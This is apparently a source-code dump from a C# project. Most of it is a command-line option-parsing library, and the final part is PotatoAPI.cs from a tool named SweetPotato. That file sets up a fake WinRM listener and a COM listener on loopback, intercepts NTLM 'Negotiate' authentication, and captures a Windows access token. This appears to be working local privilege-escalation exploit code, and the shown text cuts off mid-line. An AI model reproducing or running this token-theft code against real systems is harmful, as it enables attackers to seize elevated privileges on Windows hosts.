if (argument == "--") { 973 | process = false; 974 | continue; 975 | } 976 | if (!process) { 977 | Unprocessed(unprocessed, def, c, argument); 978 | continue; 979 | } 980 | if (AddSource(ae, argument)) 981 | continue; 982 | if (!Parse(argument, c)) 983 | Unprocessed(unprocessed, def, c, argument); 984 | } 985 | if (c.Option != null) 986 | c.Option.Invoke(c); 987 | return unprocessed; 988 | } 989 | 990 | class ArgumentEnumerator : IEnumerable { 991 | List> sources = new List>(); 992 | 993 | public ArgumentEnumerator(IEnumerable arguments) { 994 | sources.Add(arguments.GetEnumerator()); 995 | } 996 | 997 | public void Add(IEnumerable arguments) { 998 | sources.Add(arguments.GetEnumerator()); 999 | } 1000 | 1001 | public IEnumerator GetEnumerator() { 1002 | do { 1003 | IEnumerator c = sources[sources.Count - 1]; 1004 | if (c.MoveNext()) 1005 | yield return c.Current; 1006 | else { 1007 | c.Dispose(); 1008 | sources.RemoveAt(sources.Count - 1); 1009 | } 1010 | } while (sources.Count > 0); 1011 | } 1012 | 1013 | IEnumerator IEnumerable.GetEnumerator() { 1014 | return GetEnumerator(); 1015 | } 1016 | } 1017 | 1018 | bool AddSource(ArgumentEnumerator ae, string argument) { 1019 | foreach (ArgumentSource source in sources) { 1020 | IEnumerable replacement; 1021 | if (!source.GetArguments(argument, out replacement)) 1022 | continue; 1023 | ae.Add(replacement); 1024 | return true; 1025 | } 1026 | return false; 1027 | } 1028 | 1029 | private static bool Unprocessed(ICollection extra, Option def, OptionContext c, string argument) { 1030 | if (def == null) { 1031 | extra.Add(argument); 1032 | return false; 1033 | } 1034 | c.OptionValues.Add(argument); 1035 | c.Option = def; 1036 | c.Option.Invoke(c); 1037 | return false; 1038 | } 1039 | 1040 | private readonly Regex ValueOption = new Regex( 1041 | @"^(?--|-|/)(?[^:=]+)((?[:=])(?.*))?$"); 1042 | 1043 | protected bool GetOptionParts(string argument, out string flag, out string name, out string sep, out string value) { 1044 | if (argument == null) 1045 | throw new ArgumentNullException("argument"); 1046 | 1047 | flag = name = sep = value = null; 1048 | Match m = ValueOption.Match(argument); 1049 | if (!m.Success) { 1050 | return false; 1051 | } 1052 | flag = m.Groups["flag"].Value; 1053 | name = m.Groups["name"].Value; 1054 | if (m.Groups["sep"].Success && m.Groups["value"].Success) { 1055 | sep = m.Groups["sep"].Value; 1056 | value = m.Groups["value"].Value; 1057 | } 1058 | return true; 1059 | } 1060 | 1061 | protected virtual bool Parse(string argument, OptionContext c) { 1062 | if (c.Option != null) { 1063 | ParseValue(argument, c); 1064 | return true; 1065 | } 1066 | 1067 | string f, n, s, v; 1068 | if (!GetOptionParts(argument, out f, out n, out s, out v)) 1069 | return false; 1070 | 1071 | Option p; 1072 | if (Contains(n)) { 1073 | p = this[n]; 1074 | c.OptionName = f + n; 1075 | c.Option = p; 1076 | switch (p.OptionValueType) { 1077 | case OptionValueType.None: 1078 | c.OptionValues.Add(n); 1079 | c.Option.Invoke(c); 1080 | break; 1081 | case OptionValueType.Optional: 1082 | case OptionValueType.Required: 1083 | ParseValue(v, c); 1084 | break; 1085 | } 1086 | return true; 1087 | } 1088 | // no match; is it a bool option? 1089 | if (ParseBool(argument, n, c)) 1090 | return true; 1091 | // is it a bundled option? 1092 | if (ParseBundledValue(f, string.Concat(n + s + v), c)) 1093 | return true; 1094 | 1095 | return false; 1096 | } 1097 | 1098 | private void ParseValue(string option, OptionContext c) { 1099 | if (option != null) 1100 | foreach (string o in c.Option.ValueSeparators != null 1101 | ? option.Split(c.Option.ValueSeparators, c.Option.MaxValueCount - c.OptionValues.Count, StringSplitOptions.None) 1102 | : new string[] { option }) { 1103 | c.OptionValues.Add(o); 1104 | } 1105 | if (c.OptionValues.Count == c.Option.MaxValueCount || 1106 | c.Option.OptionValueType == OptionValueType.Optional) 1107 | c.Option.Invoke(c); 1108 | else if (c.OptionValues.Count > c.Option.MaxValueCount) { 1109 | throw new OptionException(localizer(string.Format( 1110 | "Error: Found {0} option values when expecting {1}.", 1111 | c.OptionValues.Count, c.Option.MaxValueCount)), 1112 | c.OptionName); 1113 | } 1114 | } 1115 | 1116 | private bool ParseBool(string option, string n, OptionContext c) { 1117 | Option p; 1118 | string rn; 1119 | if (n.Length >= 1 && (n[n.Length - 1] == '+' || n[n.Length - 1] == '-') && 1120 | Contains((rn = n.Substring(0, n.Length - 1)))) { 1121 | p = this[rn]; 1122 | string v = n[n.Length - 1] == '+' ? option : null; 1123 | c.OptionName = option; 1124 | c.Option = p; 1125 | c.OptionValues.Add(v); 1126 | p.Invoke(c); 1127 | return true; 1128 | } 1129 | return false; 1130 | } 1131 | 1132 | private bool ParseBundledValue(string f, string n, OptionContext c) { 1133 | if (f != "-") 1134 | return false; 1135 | for (int i = 0; i < n.Length; ++i) { 1136 | Option p; 1137 | string opt = f + n[i].ToString(); 1138 | string rn = n[i].ToString(); 1139 | if (!Contains(rn)) { 1140 | if (i == 0) 1141 | return false; 1142 | throw new OptionException(string.Format(localizer( 1143 | "Cannot use unregistered option '{0}' in bundle '{1}'."), rn, f + n), null); 1144 | } 1145 | p = this[rn]; 1146 | switch (p.OptionValueType) { 1147 | case OptionValueType.None: 1148 | Invoke(c, opt, n, p); 1149 | break; 1150 | case OptionValueType.Optional: 1151 | case OptionValueType.Required: { 1152 | string v = n.Substring(i + 1); 1153 | c.Option = p; 1154 | c.OptionName = opt; 1155 | ParseValue(v.Length != 0 ? v : null, c); 1156 | return true; 1157 | } 1158 | default: 1159 | throw new InvalidOperationException("Unknown OptionValueType: " + p.OptionValueType); 1160 | } 1161 | } 1162 | return true; 1163 | } 1164 | 1165 | private static void Invoke(OptionContext c, string name, string value, Option option) { 1166 | c.OptionName = name; 1167 | c.Option = option; 1168 | c.OptionValues.Add(value); 1169 | option.Invoke(c); 1170 | } 1171 | 1172 | private const int OptionWidth = 29; 1173 | private const int Description_FirstWidth = 80 - OptionWidth; 1174 | private const int Description_RemWidth = 80 - OptionWidth - 2; 1175 | 1176 | static readonly string CommandHelpIndentStart = new string(' ', OptionWidth); 1177 | static readonly string CommandHelpIndentRemaining = new string(' ', OptionWidth + 2); 1178 | 1179 | public void WriteOptionDescriptions(TextWriter o) { 1180 | foreach (Option p in this) { 1181 | int written = 0; 1182 | 1183 | if (p.Hidden) 1184 | continue; 1185 | 1186 | Category c = p as Category; 1187 | if (c != null) { 1188 | WriteDescription(o, p.Description, "", 80, 80); 1189 | continue; 1190 | } 1191 | CommandOption co = p as CommandOption; 1192 | if (co != null) { 1193 | WriteCommandDescription(o, co.Command, co.CommandName); 1194 | continue; 1195 | } 1196 | 1197 | if (!WriteOptionPrototype(o, p, ref written)) 1198 | continue; 1199 | 1200 | if (written < OptionWidth) 1201 | o.Write(new string(' ', OptionWidth - written)); 1202 | else { 1203 | o.WriteLine(); 1204 | o.Write(new string(' ', OptionWidth)); 1205 | } 1206 | 1207 | WriteDescription(o, p.Description, new string(' ', OptionWidth + 2), 1208 | Description_FirstWidth, Description_RemWidth); 1209 | } 1210 | 1211 | foreach (ArgumentSource s in sources) { 1212 | string[] names = s.GetNames(); 1213 | if (names == null || names.Length == 0) 1214 | continue; 1215 | 1216 | int written = 0; 1217 | 1218 | Write(o, ref written, " "); 1219 | Write(o, ref written, names[0]); 1220 | for (int i = 1; i < names.Length; ++i) { 1221 | Write(o, ref written, ", "); 1222 | Write(o, ref written, names[i]); 1223 | } 1224 | 1225 | if (written < OptionWidth) 1226 | o.Write(new string(' ', OptionWidth - written)); 1227 | else { 1228 | o.WriteLine(); 1229 | o.Write(new string(' ', OptionWidth)); 1230 | } 1231 | 1232 | WriteDescription(o, s.Description, new string(' ', OptionWidth + 2), 1233 | Description_FirstWidth, Description_RemWidth); 1234 | } 1235 | } 1236 | 1237 | internal void WriteCommandDescription(TextWriter o, Command c, string commandName) { 1238 | var name = new string(' ', 8) + (commandName ?? c.Name); 1239 | if (name.Length < OptionWidth - 1) { 1240 | WriteDescription(o, name + new string(' ', OptionWidth - name.Length) + c.Help, CommandHelpIndentRemaining, 80, Description_RemWidth); 1241 | } else { 1242 | WriteDescription(o, name, "", 80, 80); 1243 | WriteDescription(o, CommandHelpIndentStart + c.Help, CommandHelpIndentRemaining, 80, Description_RemWidth); 1244 | } 1245 | } 1246 | 1247 | void WriteDescription(TextWriter o, string value, string prefix, int firstWidth, int remWidth) { 1248 | bool indent = false; 1249 | foreach (string line in GetLines(localizer(GetDescription(value)), firstWidth, remWidth)) { 1250 | if (indent) 1251 | o.Write(prefix); 1252 | o.WriteLine(line); 1253 | indent = true; 1254 | } 1255 | } 1256 | 1257 | bool WriteOptionPrototype(TextWriter o, Option p, ref int written) { 1258 | string[] names = p.Names; 1259 | 1260 | int i = GetNextOptionIndex(names, 0); 1261 | if (i == names.Length) 1262 | return false; 1263 | 1264 | if (names[i].Length == 1) { 1265 | Write(o, ref written, " -"); 1266 | Write(o, ref written, names[0]); 1267 | } else { 1268 | Write(o, ref written, " --"); 1269 | Write(o, ref written, names[0]); 1270 | } 1271 | 1272 | for (i = GetNextOptionIndex(names, i + 1); 1273 | i < names.Length; i = GetNextOptionIndex(names, i + 1)) { 1274 | Write(o, ref written, ", "); 1275 | Write(o, ref written, names[i].Length == 1 ? "-" : "--"); 1276 | Write(o, ref written, names[i]); 1277 | } 1278 | 1279 | if (p.OptionValueType == OptionValueType.Optional || 1280 | p.OptionValueType == OptionValueType.Required) { 1281 | if (p.OptionValueType == OptionValueType.Optional) { 1282 | Write(o, ref written, localizer("[")); 1283 | } 1284 | Write(o, ref written, localizer("=" + GetArgumentName(0, p.MaxValueCount, p.Description))); 1285 | string sep = p.ValueSeparators != null && p.ValueSeparators.Length > 0 1286 | ? p.ValueSeparators[0] 1287 | : " "; 1288 | for (int c = 1; c < p.MaxValueCount; ++c) { 1289 | Write(o, ref written, localizer(sep + GetArgumentName(c, p.MaxValueCount, p.Description))); 1290 | } 1291 | if (p.OptionValueType == OptionValueType.Optional) { 1292 | Write(o, ref written, localizer("]")); 1293 | } 1294 | } 1295 | return true; 1296 | } 1297 | 1298 | static int GetNextOptionIndex(string[] names, int i) { 1299 | while (i < names.Length && names[i] == "<>") { 1300 | ++i; 1301 | } 1302 | return i; 1303 | } 1304 | 1305 | static void Write(TextWriter o, ref int n, string s) { 1306 | n += s.Length; 1307 | o.Write(s); 1308 | } 1309 | 1310 | static string GetArgumentName(int index, int maxIndex, string description) { 1311 | var matches = Regex.Matches(description ?? "", @"(?<=(? 1 1320 | if (maxIndex > 1 && parts.Length == 2 && 1321 | parts[0] == index.ToString(CultureInfo.InvariantCulture)) { 1322 | argName = parts[1]; 1323 | } 1324 | } 1325 | 1326 | if (string.IsNullOrEmpty(argName)) { 1327 | argName = maxIndex == 1 ? "VALUE" : "VALUE" + (index + 1); 1328 | } 1329 | return argName; 1330 | } 1331 | 1332 | private static string GetDescription(string description) { 1333 | if (description == null) 1334 | return string.Empty; 1335 | StringBuilder sb = new StringBuilder(description.Length); 1336 | int start = -1; 1337 | for (int i = 0; i < description.Length; ++i) { 1338 | switch (description[i]) { 1339 | case '{': 1340 | if (i == start) { 1341 | sb.Append('{'); 1342 | start = -1; 1343 | } else if (start < 0) 1344 | start = i + 1; 1345 | break; 1346 | case '}': 1347 | if (start < 0) { 1348 | if ((i + 1) == description.Length || description[i + 1] != '}') 1349 | throw new InvalidOperationException("Invalid option description: " + description); 1350 | ++i; 1351 | sb.Append("}"); 1352 | } else { 1353 | sb.Append(description.Substring(start, i - start)); 1354 | start = -1; 1355 | } 1356 | break; 1357 | case ':': 1358 | if (start < 0) 1359 | goto default; 1360 | start = i + 1; 1361 | break; 1362 | default: 1363 | if (start < 0) 1364 | sb.Append(description[i]); 1365 | break; 1366 | } 1367 | } 1368 | return sb.ToString(); 1369 | } 1370 | 1371 | private static IEnumerable GetLines(string description, int firstWidth, int remWidth) { 1372 | return StringCoda.WrappedLines(description, firstWidth, remWidth); 1373 | } 1374 | } 1375 | 1376 | public class Command { 1377 | public string Name { get; } 1378 | public string Help { get; } 1379 | 1380 | public OptionSet Options { get; set; } 1381 | public Action> Run { get; set; } 1382 | 1383 | public CommandSet CommandSet { get; internal set; } 1384 | 1385 | public Command(string name, string help = null) { 1386 | if (string.IsNullOrEmpty(name)) 1387 | throw new ArgumentNullException(nameof(name)); 1388 | 1389 | Name = NormalizeCommandName(name); 1390 | Help = help; 1391 | } 1392 | 1393 | static string NormalizeCommandName(string name) { 1394 | var value = new StringBuilder(name.Length); 1395 | var space = false; 1396 | for (int i = 0; i < name.Length; ++i) { 1397 | if (!char.IsWhiteSpace(name, i)) { 1398 | space = false; 1399 | value.Append(name[i]); 1400 | } else if (!space) { 1401 | space = true; 1402 | value.Append(' '); 1403 | } 1404 | } 1405 | return value.ToString(); 1406 | } 1407 | 1408 | public virtual int Invoke(IEnumerable arguments) { 1409 | var rest = Options?.Parse(arguments) ?? arguments; 1410 | Run?.Invoke(rest); 1411 | return 0; 1412 | } 1413 | } 1414 | 1415 | class CommandOption : Option { 1416 | public Command Command { get; } 1417 | public string CommandName { get; } 1418 | 1419 | // Prototype starts with '=' because this is an invalid prototype 1420 | // (see Option.ParsePrototype(), and thus it'll prevent Category 1421 | // instances from being accidentally used as normal options. 1422 | public CommandOption(Command command, string commandName = null, bool hidden = false) 1423 | : base("=:Command:= " + (commandName ?? command?.Name), (commandName ?? command?.Name), maxValueCount: 0, hidden: hidden) { 1424 | if (command == null) 1425 | throw new ArgumentNullException(nameof(command)); 1426 | Command = command; 1427 | CommandName = commandName ?? command.Name; 1428 | } 1429 | 1430 | protected override void OnParseComplete(OptionContext c) { 1431 | throw new NotSupportedException("CommandOption.OnParseComplete should not be invoked."); 1432 | } 1433 | } 1434 | 1435 | class HelpOption : Option { 1436 | Option option; 1437 | CommandSet commands; 1438 | 1439 | public HelpOption(CommandSet commands, Option d) 1440 | : base(d.Prototype, d.Description, d.MaxValueCount, d.Hidden) { 1441 | this.commands = commands; 1442 | this.option = d; 1443 | } 1444 | 1445 | protected override void OnParseComplete(OptionContext c) { 1446 | commands.showHelp = true; 1447 | 1448 | option?.InvokeOnParseComplete(c); 1449 | } 1450 | } 1451 | 1452 | class CommandOptionSet : OptionSet { 1453 | CommandSet commands; 1454 | 1455 | public CommandOptionSet(CommandSet commands, MessageLocalizerConverter localizer) 1456 | : base(localizer) { 1457 | this.commands = commands; 1458 | } 1459 | 1460 | protected override void SetItem(int index, Option item) { 1461 | if (ShouldWrapOption(item)) { 1462 | base.SetItem(index, new HelpOption(commands, item)); 1463 | return; 1464 | } 1465 | base.SetItem(index, item); 1466 | } 1467 | 1468 | bool ShouldWrapOption(Option item) { 1469 | if (item == null) 1470 | return false; 1471 | var help = item as HelpOption; 1472 | if (help != null) 1473 | return false; 1474 | foreach (var n in item.Names) { 1475 | if (n == "help") 1476 | return true; 1477 | } 1478 | return false; 1479 | } 1480 | 1481 | protected override void InsertItem(int index, Option item) { 1482 | if (ShouldWrapOption(item)) { 1483 | base.InsertItem(index, new HelpOption(commands, item)); 1484 | return; 1485 | } 1486 | base.InsertItem(index, item); 1487 | } 1488 | } 1489 | 1490 | public class CommandSet : KeyedCollection { 1491 | readonly string suite; 1492 | 1493 | OptionSet options; 1494 | TextWriter outWriter; 1495 | TextWriter errorWriter; 1496 | 1497 | internal List NestedCommandSets; 1498 | 1499 | internal HelpCommand help; 1500 | 1501 | internal bool showHelp; 1502 | 1503 | internal OptionSet Options => options; 1504 | 1505 | #if !PCL || NETSTANDARD1_3 1506 | public CommandSet(string suite, MessageLocalizerConverter localizer = null) 1507 | : this(suite, Console.Out, Console.Error, localizer) { 1508 | } 1509 | #endif 1510 | 1511 | public CommandSet(string suite, TextWriter output, TextWriter error, MessageLocalizerConverter localizer = null) { 1512 | if (suite == null) 1513 | throw new ArgumentNullException(nameof(suite)); 1514 | if (output == null) 1515 | throw new ArgumentNullException(nameof(output)); 1516 | if (error == null) 1517 | throw new ArgumentNullException(nameof(error)); 1518 | 1519 | this.suite = suite; 1520 | options = new CommandOptionSet(this, localizer); 1521 | outWriter = output; 1522 | errorWriter = error; 1523 | } 1524 | 1525 | public string Suite => suite; 1526 | public TextWriter Out => outWriter; 1527 | public TextWriter Error => errorWriter; 1528 | public MessageLocalizerConverter MessageLocalizer => options.MessageLocalizer; 1529 | 1530 | protected override string GetKeyForItem(Command item) { 1531 | return item?.Name; 1532 | } 1533 | 1534 | public new CommandSet Add(Command value) { 1535 | if (value == null) 1536 | throw new ArgumentNullException(nameof(value)); 1537 | AddCommand(value); 1538 | options.Add(new CommandOption(value)); 1539 | return this; 1540 | } 1541 | 1542 | void AddCommand(Command value) { 1543 | if (value.CommandSet != null && value.CommandSet != this) { 1544 | throw new ArgumentException("Command instances can only be added to a single CommandSet.", nameof(value)); 1545 | } 1546 | value.CommandSet = this; 1547 | if (value.Options != null) { 1548 | value.Options.MessageLocalizer = options.MessageLocalizer; 1549 | } 1550 | 1551 | base.Add(value); 1552 | 1553 | help = help ?? value as HelpCommand; 1554 | } 1555 | 1556 | public CommandSet Add(string header) { 1557 | options.Add(header); 1558 | return this; 1559 | } 1560 | 1561 | public CommandSet Add(Option option) { 1562 | options.Add(option); 1563 | return this; 1564 | } 1565 | 1566 | public CommandSet Add(string prototype, Action action) { 1567 | options.Add(prototype, action); 1568 | return this; 1569 | } 1570 | 1571 | public CommandSet Add(string prototype, string description, Action action) { 1572 | options.Add(prototype, description, action); 1573 | return this; 1574 | } 1575 | 1576 | public CommandSet Add(string prototype, string description, Action action, bool hidden) { 1577 | options.Add(prototype, description, action, hidden); 1578 | return this; 1579 | } 1580 | 1581 | public CommandSet Add(string prototype, OptionAction action) { 1582 | options.Add(prototype, action); 1583 | return this; 1584 | } 1585 | 1586 | public CommandSet Add(string prototype, string description, OptionAction action) { 1587 | options.Add(prototype, description, action); 1588 | return this; 1589 | } 1590 | 1591 | public CommandSet Add(string prototype, string description, OptionAction action, bool hidden) { 1592 | options.Add(prototype, description, action, hidden); 1593 | return this; 1594 | } 1595 | 1596 | public CommandSet Add(string prototype, Action action) { 1597 | options.Add(prototype, null, action); 1598 | return this; 1599 | } 1600 | 1601 | public CommandSet Add(string prototype, string description, Action action) { 1602 | options.Add(prototype, description, action); 1603 | return this; 1604 | } 1605 | 1606 | public CommandSet Add(string prototype, OptionAction action) { 1607 | options.Add(prototype, action); 1608 | return this; 1609 | } 1610 | 1611 | public CommandSet Add(string prototype, string description, OptionAction action) { 1612 | options.Add(prototype, description, action); 1613 | return this; 1614 | } 1615 | 1616 | public CommandSet Add(ArgumentSource source) { 1617 | options.Add(source); 1618 | return this; 1619 | } 1620 | 1621 | public CommandSet Add(CommandSet nestedCommands) { 1622 | if (nestedCommands == null) 1623 | throw new ArgumentNullException(nameof(nestedCommands)); 1624 | 1625 | if (NestedCommandSets == null) { 1626 | NestedCommandSets = new List(); 1627 | } 1628 | 1629 | if (!AlreadyAdded(nestedCommands)) { 1630 | NestedCommandSets.Add(nestedCommands); 1631 | foreach (var o in nestedCommands.options) { 1632 | if (o is CommandOption c) { 1633 | options.Add(new CommandOption(c.Command, $"{nestedCommands.Suite} {c.CommandName}")); 1634 | } else { 1635 | options.Add(o); 1636 | } 1637 | } 1638 | } 1639 | 1640 | nestedCommands.options = this.options; 1641 | nestedCommands.outWriter = this.outWriter; 1642 | nestedCommands.errorWriter = this.errorWriter; 1643 | 1644 | return this; 1645 | } 1646 | 1647 | bool AlreadyAdded(CommandSet value) { 1648 | if (value == this) 1649 | return true; 1650 | if (NestedCommandSets == null) 1651 | return false; 1652 | foreach (var nc in NestedCommandSets) { 1653 | if (nc.AlreadyAdded(value)) 1654 | return true; 1655 | } 1656 | return false; 1657 | } 1658 | 1659 | public IEnumerable GetCompletions(string prefix = null) { 1660 | string rest; 1661 | ExtractToken(ref prefix, out rest); 1662 | 1663 | foreach (var command in this) { 1664 | if (command.Name.StartsWith(prefix, StringComparison.OrdinalIgnoreCase)) { 1665 | yield return command.Name; 1666 | } 1667 | } 1668 | 1669 | if (NestedCommandSets == null) 1670 | yield break; 1671 | 1672 | foreach (var subset in NestedCommandSets) { 1673 | if (subset.Suite.StartsWith(prefix, StringComparison.OrdinalIgnoreCase)) { 1674 | foreach (var c in subset.GetCompletions(rest)) { 1675 | yield return $"{subset.Suite} {c}"; 1676 | } 1677 | } 1678 | } 1679 | } 1680 | 1681 | static void ExtractToken(ref string input, out string rest) { 1682 | rest = ""; 1683 | input = input ?? ""; 1684 | 1685 | int top = input.Length; 1686 | for (int i = 0; i < top; i++) { 1687 | if (char.IsWhiteSpace(input[i])) 1688 | continue; 1689 | 1690 | for (int j = i; j < top; j++) { 1691 | if (char.IsWhiteSpace(input[j])) { 1692 | rest = input.Substring(j).Trim(); 1693 | input = input.Substring(i, j).Trim(); 1694 | return; 1695 | } 1696 | } 1697 | rest = ""; 1698 | if (i != 0) 1699 | input = input.Substring(i).Trim(); 1700 | return; 1701 | } 1702 | } 1703 | 1704 | public int Run(IEnumerable arguments) { 1705 | if (arguments == null) 1706 | throw new ArgumentNullException(nameof(arguments)); 1707 | 1708 | this.showHelp = false; 1709 | if (help == null) { 1710 | help = new HelpCommand(); 1711 | AddCommand(help); 1712 | } 1713 | Action setHelp = v => showHelp = v != null; 1714 | if (!options.Contains("help")) { 1715 | options.Add("help", "", setHelp, hidden: true); 1716 | } 1717 | if (!options.Contains("?")) { 1718 | options.Add("?", "", setHelp, hidden: true); 1719 | } 1720 | var extra = options.Parse(arguments); 1721 | if (extra.Count == 0) { 1722 | if (showHelp) { 1723 | return help.Invoke(extra); 1724 | } 1725 | Out.WriteLine(options.MessageLocalizer($"Use `{Suite} help` for usage.")); 1726 | return 1; 1727 | } 1728 | var command = GetCommand(extra); 1729 | if (command == null) { 1730 | help.WriteUnknownCommand(extra[0]); 1731 | return 1; 1732 | } 1733 | if (showHelp) { 1734 | if (command.Options?.Contains("help") ?? true) { 1735 | extra.Add("--help"); 1736 | return command.Invoke(extra); 1737 | } 1738 | command.Options.WriteOptionDescriptions(Out); 1739 | return 0; 1740 | } 1741 | return command.Invoke(extra); 1742 | } 1743 | 1744 | internal Command GetCommand(List extra) { 1745 | return TryGetLocalCommand(extra) ?? TryGetNestedCommand(extra); 1746 | } 1747 | 1748 | Command TryGetLocalCommand(List extra) { 1749 | var name = extra[0]; 1750 | if (Contains(name)) { 1751 | extra.RemoveAt(0); 1752 | return this[name]; 1753 | } 1754 | for (int i = 1; i < extra.Count; ++i) { 1755 | name = name + " " + extra[i]; 1756 | if (!Contains(name)) 1757 | continue; 1758 | extra.RemoveRange(0, i + 1); 1759 | return this[name]; 1760 | } 1761 | return null; 1762 | } 1763 | 1764 | Command TryGetNestedCommand(List extra) { 1765 | if (NestedCommandSets == null) 1766 | return null; 1767 | 1768 | var nestedCommands = NestedCommandSets.Find(c => c.Suite == extra[0]); 1769 | if (nestedCommands == null) 1770 | return null; 1771 | 1772 | var extraCopy = new List(extra); 1773 | extraCopy.RemoveAt(0); 1774 | if (extraCopy.Count == 0) 1775 | return null; 1776 | 1777 | var command = nestedCommands.GetCommand(extraCopy); 1778 | if (command != null) { 1779 | extra.Clear(); 1780 | extra.AddRange(extraCopy); 1781 | return command; 1782 | } 1783 | return null; 1784 | } 1785 | } 1786 | 1787 | public class HelpCommand : Command { 1788 | public HelpCommand() 1789 | : base("help", help: "Show this message and exit") { 1790 | } 1791 | 1792 | public override int Invoke(IEnumerable arguments) { 1793 | var extra = new List(arguments ?? new string[0]); 1794 | var _ = CommandSet.Options.MessageLocalizer; 1795 | if (extra.Count == 0) { 1796 | CommandSet.Options.WriteOptionDescriptions(CommandSet.Out); 1797 | return 0; 1798 | } 1799 | var command = CommandSet.GetCommand(extra); 1800 | if (command == this || extra.Contains("--help")) { 1801 | CommandSet.Out.WriteLine(_($"Usage: {CommandSet.Suite} COMMAND [OPTIONS]")); 1802 | CommandSet.Out.WriteLine(_($"Use `{CommandSet.Suite} help COMMAND` for help on a specific command.")); 1803 | CommandSet.Out.WriteLine(); 1804 | CommandSet.Out.WriteLine(_($"Available commands:")); 1805 | CommandSet.Out.WriteLine(); 1806 | var commands = GetCommands(); 1807 | commands.Sort((x, y) => string.Compare(x.Key, y.Key, StringComparison.OrdinalIgnoreCase)); 1808 | foreach (var c in commands) { 1809 | if (c.Key == "help") { 1810 | continue; 1811 | } 1812 | CommandSet.Options.WriteCommandDescription(CommandSet.Out, c.Value, c.Key); 1813 | } 1814 | CommandSet.Options.WriteCommandDescription(CommandSet.Out, CommandSet.help, "help"); 1815 | return 0; 1816 | } 1817 | if (command == null) { 1818 | WriteUnknownCommand(extra[0]); 1819 | return 1; 1820 | } 1821 | if (command.Options != null) { 1822 | command.Options.WriteOptionDescriptions(CommandSet.Out); 1823 | return 0; 1824 | } 1825 | return command.Invoke(new[] { "--help" }); 1826 | } 1827 | 1828 | List> GetCommands() { 1829 | var commands = new List>(); 1830 | 1831 | foreach (var c in CommandSet) { 1832 | commands.Add(new KeyValuePair(c.Name, c)); 1833 | } 1834 | 1835 | if (CommandSet.NestedCommandSets == null) 1836 | return commands; 1837 | 1838 | foreach (var nc in CommandSet.NestedCommandSets) { 1839 | AddNestedCommands(commands, "", nc); 1840 | } 1841 | 1842 | return commands; 1843 | } 1844 | 1845 | void AddNestedCommands(List> commands, string outer, CommandSet value) { 1846 | foreach (var v in value) { 1847 | commands.Add(new KeyValuePair($"{outer}{value.Suite} {v.Name}", v)); 1848 | } 1849 | if (value.NestedCommandSets == null) 1850 | return; 1851 | foreach (var nc in value.NestedCommandSets) { 1852 | AddNestedCommands(commands, $"{outer}{value.Suite} ", nc); 1853 | } 1854 | } 1855 | 1856 | internal void WriteUnknownCommand(string unknownCommand) { 1857 | CommandSet.Error.WriteLine(CommandSet.Options.MessageLocalizer($"{CommandSet.Suite}: Unknown command: {unknownCommand}")); 1858 | CommandSet.Error.WriteLine(CommandSet.Options.MessageLocalizer($"{CommandSet.Suite}: Use `{CommandSet.Suite} help` for usage.")); 1859 | } 1860 | } 1861 | } 1862 | -------------------------------------------------------------------------------- /PotatoAPI.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Net; 4 | using System.Net.Sockets; 5 | using System.Text; 6 | using System.Text.RegularExpressions; 7 | using System.Threading; 8 | 9 | namespace SweetPotato { 10 | 11 | public enum ExecutionMethod { 12 | Auto, 13 | Token, 14 | User 15 | } 16 | 17 | public class PotatoAPI { 18 | 19 | Thread comListener; 20 | Thread winRMListener; 21 | LocalNegotiator negotiator = new LocalNegotiator(); 22 | Guid clsId; 23 | readonly int port; 24 | bool fakeWinRM; 25 | volatile bool dcomComplete = false; 26 | 27 | 28 | public IntPtr Token { 29 | get { 30 | return negotiator.Token; 31 | } 32 | } 33 | 34 | EventWaitHandle readyEvent = new EventWaitHandle(false, EventResetMode.AutoReset); 35 | 36 | public PotatoAPI(Guid clsId, ushort port, bool fakeWinRM) { 37 | this.clsId = clsId; 38 | this.port = port; 39 | this.fakeWinRM = fakeWinRM; 40 | 41 | if (fakeWinRM) 42 | StartWinRMThread(); 43 | else 44 | StartCOMListenerThread(); 45 | } 46 | 47 | public Thread StartWinRMThread() { 48 | winRMListener = new Thread(WinRMListener); 49 | winRMListener.Start(); 50 | return winRMListener; 51 | } 52 | 53 | public Thread StartCOMListenerThread() { 54 | comListener = new Thread(COMListener); 55 | comListener.Start(); 56 | return comListener; 57 | } 58 | 59 | string GetAuthorizationHeader(Socket socket) { 60 | 61 | byte[] buffer = new byte[4096]; 62 | int len = socket.Receive(buffer); 63 | 64 | string authRequest = Encoding.ASCII.GetString(buffer); 65 | 66 | Regex rx = new Regex(@"Authorization: Negotiate (?.*)"); 67 | MatchCollection matches = rx.Matches(authRequest); 68 | 69 | if(matches.Count == 0) { 70 | return null; 71 | } 72 | 73 | return matches[0].Groups["neg"].Value; 74 | } 75 | 76 | void WinRMListener() { 77 | 78 | Socket listenSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); 79 | listenSocket.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.ReuseAddress, 1); 80 | 81 | listenSocket.Bind(new IPEndPoint(IPAddress.Loopback, 5985)); 82 | listenSocket.Listen(10); 83 | readyEvent.Set(); 84 | 85 | while (!listenSocket.Poll(100000, SelectMode.SelectRead)) { 86 | if (dcomComplete) 87 | return; 88 | } 89 | 90 | Socket clientSocket = listenSocket.Accept(); 91 | 92 | string authHeader = GetAuthorizationHeader(clientSocket); 93 | negotiator.HandleType1(Convert.FromBase64String(authHeader)); 94 | 95 | string challengeResponse = String.Format( 96 | "HTTP/1.1 401 Unauthorized\n" + 97 | "WWW-Authenticate: Negotiate {0}\n" + 98 | "Content-Length: 0\n" + 99 | "Connection: Keep-Alive\n\n", 100 | Convert.ToBase64String(negotiator.Challenge) 101 | ); 102 | 103 | clientSocket.Send(Encoding.ASCII.GetBytes(challengeResponse)); 104 | authHeader = GetAuthorizationHeader(clientSocket); 105 | 106 | negotiator.HandleType3(Convert.FromBase64String(authHeader)); 107 | 108 | clientSocket.Close(); 109 | listenSocket.Close(); 110 | } 111 | 112 | void COMListener() { 113 | 114 | try { 115 | Socket listenSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); 116 | listenSocket.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.ReuseAddress, 1); 117 | 118 | listenSocket.Bind(new IPEndPoint(IPAddress.Loopback, port)); 119 | listenSocket.Listen(10); 120 | readyEvent.Set(); 121 | 122 | while (!listenSocket.Poll(100000, SelectMode.SelectRead)) { 123 | if (dcomComplete) 124 | return; 125 | } 126 | 127 | Socket clientSocket = listenSocket.Accept(); 128 | Socket rpcSocket = new 